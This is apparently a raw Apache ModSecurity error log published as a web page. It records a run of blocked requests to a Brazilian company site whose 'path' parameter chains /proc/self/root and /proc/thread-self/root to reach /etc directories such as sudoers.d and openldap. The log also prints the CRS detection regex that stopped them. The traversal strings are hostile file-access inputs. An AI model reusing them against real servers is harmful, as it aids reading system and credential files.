https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:45.964074 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:35786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMqSmAPhZkrhU8w4lVoQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:47.371303 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:35794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMq-oXxyEfFpUF8f9XBAAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:48.678729 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.243.128:35806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMrOw_le52K8_3pV3IwwAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:49.991767 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:54652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMrcdf6f5d65gmYZS8TQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:50.021305 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:50028] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMruyqAr6etmhZHNqmJgAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:29:51.290949 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:54660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMr-oXxyEfFpUF8f9XCgAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:53.654767 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:54662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMscdf6f5d65gmYZS8UgAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:55.005925 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:54668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMs-yqAr6etmhZHNqmKQAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:56.281104 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:54684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMtPu8EFLIOrSqIpvtpQAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:29:57.628856 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:54696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMtda6ubjKNq_cu4aAogAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:30:00.070059 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:54702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMuNY0UrI5A3LftIyIpQAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:30:04.862561 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:46218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMvPu8EFLIOrSqIpvtuAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:30:08.515486 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:45616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMwPu8EFLIOrSqIpvtvgAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:30:10.575428 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:46226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMwta6ubjKNq_cu4aAsgAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:30:11.857768 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:36742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMw9a6ubjKNq_cu4aAtQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:30:20.155480 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:36746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMzEzinOy1jxa1j4f7dQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:30:40.156419 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:55598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqM4OyqAr6etmhZHNqmWgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:30:41.506048 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:43686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqM4cdf6f5d65gmYZS8dwAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:30:46.310518 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:43688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqM5sdf6f5d65gmYZS8iQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:31:34.448743 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:39118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNFgkwaGbbGflqUZD5bQAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:31:40.842985 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:43698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNG8df6f5d65gmYZS8wwAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:31:45.836126 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:60396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNIUzinOy1jxa1j4f7rwAAAQo"], referer: 